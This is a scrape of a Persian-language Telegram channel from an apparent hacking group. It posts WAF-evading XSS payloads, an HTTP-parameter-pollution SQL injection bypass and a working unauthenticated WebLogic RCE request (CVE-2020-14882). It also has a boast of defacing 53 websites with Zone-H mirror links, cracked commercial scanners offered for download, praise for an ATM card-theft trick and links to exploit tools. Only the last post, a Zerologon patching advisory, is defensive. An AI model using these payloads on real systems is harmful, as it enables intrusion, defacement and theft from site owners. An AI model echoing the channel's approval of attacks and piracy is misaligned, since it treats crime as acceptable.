Unidentified T E A M
1.1K subscribers
230 photos
45 videos
85 files
277 links
~⚘🌹 Just God 🌷~

🇮🇷 Unidentified Security Team 🇮🇷
_________________________________________________
< The Best Cyber Security Team in Iran right now

Support TEAM: @UNIDENTIFIED_TM_bot
Download Telegram
پک کامل دوره های تست نفوذ از منابع مختلف
https://drive.google.com/drive/folders/1g152p22t0od_Ak1YEqTdTCIxcI57eL36
🌹کشف آسیب پذیری در سرویس های سرور هدف با استفاده از اسکریپت vulners

دستورالعمل:
wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb

و سپس:

nmap -sV --script vulners <target>


@Unidentified_TM
پیلود xss برای بایپس کردن WAF

<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">


<svg onload=&#97&#108&#101&#114&#116(1)>

@Unidentified_TM
روز برنامه نویسان مبارک❤️
This media is not supported in your browser
VIEW IN TELEGRAM
اینم یه حرکت هوشمندانه برای سرقت اطلاعات کارت بانکی و حساب در دستگاه عابر بانک((:
نحوه ی بایپس کردن Web Application Firewall در حملات sqli !

حمله ی معمولی:
http://webApplication/showproducts.asp?prodID=9 UNION SELECT 1,2,3 FROM Users WHERE id=3 --


حمله توسط روش HPP:
http://webApplication/showproducts.asp?prodID=9 /*&prodID=*/UNION /*&prodID=*/SELECT 1 &prodID=2 &prodID=3 FROM /*&prodID=*/Users /*&prodID=*/ WHERE id=3 --

@Unidentified_TM
سوالات خیلی از دوستان راجع به نقشه راه بود
انشالله بزودی راجع به نقشه راه پست میذارم
۵۳ سایت آمریکایی مورد نفوذ قرار گرفت 🌹
Link :
https://news.tharunaya.us/

https://m.tharunaya.us/

https://vb.tharunaya.us/

https://health.tharunaya.us/

https://mobile.tharunaya.us/

http://ahagatenamane.tharunaya.us/

http://aluthaurudu.tharunaya.us/

http://fenshui.tharunaya.us/

http://health.tharunaya.us/

http://jathakakatha.tharunaya.us/

http://beauty.tharunaya.us/

http://hindilyrics.tharunaya.us/

http://iranama.tharunaya.us/

http://articles.tharunaya.us/

http://gammedda.tharunaya.us/

http://happylife.tharunaya.us/

http://gindaravideos.tharunaya.us/

http://apeurumaya.tharunaya.us/

http://demansala.tharunaya.us/

http://architect.tharunaya.us/

http://hollywood.tharunaya.us/

http://bollywood.tharunaya.us/

http://deiyosakki.tharunaya.us/

Fenshui |http://fenshui.tharunaya.us/

http://jokes.tharunaya.us/

http://cdn.tharunaya.us/

http://englishlyrics.tharunaya.us/

http://hair.tharunaya.us/

http://birthday-wishes.tharunaya.us/

http://kitchen.tharunaya.us/

http://krushikarmaya.tharunaya.us/

http://lagnapalapala.tharunaya.us/

http://laws.tharunaya.us/

http://manovidyawa.tharunaya.us/

http://medical.tharunaya.us/

http://models.tharunaya.us/

http://mother-dreams.tharunaya.us/

http://nelumvila.tharunaya.us/

http://news.tharunaya.us/

property.tharunaya.us

sexeducation.tharunaya.us

http://sinhalafilms.tharunaya.us/

http://siriyahane-so-susum.tharunaya.us/

http://person.tharunaya.us/

http://prathirawa.tharunaya.us/

http://teledrama.tharunaya.us/

http://shortstory.tharunaya.us/

http://travel.tharunaya.us/

http://tvchannels.tharunaya.us/

http://vehicles.tharunaya.us/

http://wallpapers.tharunaya.us/

http://vilangu.tharunaya.us/

http://vidyathakshana.tharunaya.us/


Zone-H:
http://www.zone-h.org/mirror/id/34266565
http://www.zone-h.org/mirror/id/34266564
http://www.zone-h.org/mirror/id/34266563
http://www.zone-h.org/mirror/id/34266562
http://www.zone-h.org/mirror/id/34266561
http://www.zone-h.org/mirror/id/34266560
http://www.zone-h.org/mirror/id/34266559
http://www.zone-h.org/mirror/id/34266558
http://www.zone-h.org/mirror/id/34266557
http://www.zone-h.org/mirror/id/34266556
http://www.zone-h.org/mirror/id/34266555
http://www.zone-h.org/mirror/id/34266554
http://www.zone-h.org/mirror/id/34266553
http://www.zone-h.org/mirror/id/34266552
http://www.zone-h.org/mirror/id/34266551
http://www.zone-h.org/mirror/id/34266550
http://www.zone-h.org/mirror/id/34266549
http://www.zone-h.org/mirror/id/34266548
http://www.zone-h.org/mirror/id/34266547
http://www.zone-h.org/mirror/id/34266546
http://www.zone-h.org/mirror/id/34266545
http://www.zone-h.org/mirror/id/34266544
http://www.zone-h.org/mirror/id/34266532
http://www.zone-h.org/mirror/id/34266531
http://www.zone-h.org/mirror/id/34266530
http://www.zone-h.org/mirror/id/34266529
http://www.zone-h.org/mirror/id/34266528
http://www.zone-h.org/mirror/id/34266527
http://www.zone-h.org/mirror/id/34266526
http://www.zone-h.org/mirror/id/34266525
http://www.zone-h.org/mirror/id/34266524
http://www.zone-h.org/mirror/id/34266523
http://www.zone-h.org/mirror/id/34266451
http://www.zone-h.org/mirror/id/34266450
http://www.zone-h.org/mirror/id/34266449
http://www.zone-h.org/mirror/id/34266448
http://www.zone-h.org/mirror/id/34266447
http://www.zone-h.org/mirror/id/34266446

@Unidentified_TM 🌹
Scanners.zip
1003.2 MB
-𝙒𝙀𝘽 𝙎𝘾𝘼𝙉𝙉𝙀𝙍 𝙋𝘼𝘾𝙆-

𝐂𝐎𝐑𝐄 𝐈𝐌𝐏𝐀𝐂𝐓
𝐈𝐁𝐌
𝐍𝐄𝐓𝐒𝐏𝐀𝐑𝐊𝐄𝐑

این سه اسکنر وب به قیمت های بالا بفروش میرسید که تو سایت هاشون مشخصه میتونید ببینید
نسخه های کرک شده آخرین ورژن این سه اسکنر براتون اپلود کردیم استفاده کنید
نشر دهید 🌹


@Unidentified_TM
ابزار LARE برای انجام عملیات pivoting بر روی لینوکسی که دسترسی به اینترنت نداره. این ابزار با استفاده از localroot سطح دسترسی رو بالا میبره.
https://github.com/EnigmaDimitri/LARE

#linux
@UNIDENTIFIED_TM
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت

CVE-2020–14882

http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)


https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

#weblogic
#rce
#java


@UNIDENTIFIED_TM 🌹
آسیب پذیری عجیب Tiki Wiki Cms Groupware

CVE-2020-15906


https://github.com/S1lkys/CVE-2020-15906


بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!

#web
#pentest
#writeup


@UNIDENTIFIED_TM
Unidentified T E A M
شرح آسیب پذیری Zerologon که با سوء استفاده از NetLogon مهاجم را به دامین کنترلر میرساند https://www.tenable.com/blog/cve-2020-1472-zerologon-vulnerability-in-netlogon-could-allow-attackers-to-hijack-windows https://www.secura.com/pathtoimg.php?id=2055 …
‼️ مدیران شبکه ای که هنوز ویندوز سرور 2008R2 دارند توجه فرمایند !!!

▪️ ماژول امنیتی ضد حمله IDS که در ویدئوهای حملات Zerologon هفته گذشته قدرت آن را مشاهده کردید به صورت پیش فرض در ویندوز های 2008R2 فعال نیست و باید طبق راهنمای زیر حتما به صورت دستی بر روی سرورهای شما فعال شود. همچنین این ماژول در برخی موارد بعد از ارتقای نسخه ESET File Security باید مجدد طبق همین راهنما فعال شود !!!

‼️ با توجه به اینکه وصله کردن آسیب پذیری Zerologon در ویندوز 2008R2 با دشواری های خاص خود همراه است فعال نبودن IDS همانند این ویدئو منجر به هک شدن کامل سرور خواهد شد.

▪️ اکیدا توصیه میکنیم در اولین فرصت و با توجه به اینکه دیگر آپدیت های امنیتی توسط Microsoft برای این ویندوز ارائه نمیشود ، نسبت به ارتقای این سرور های منسوخ اقدام فرمائید.

@UNIDENTIFIED_TM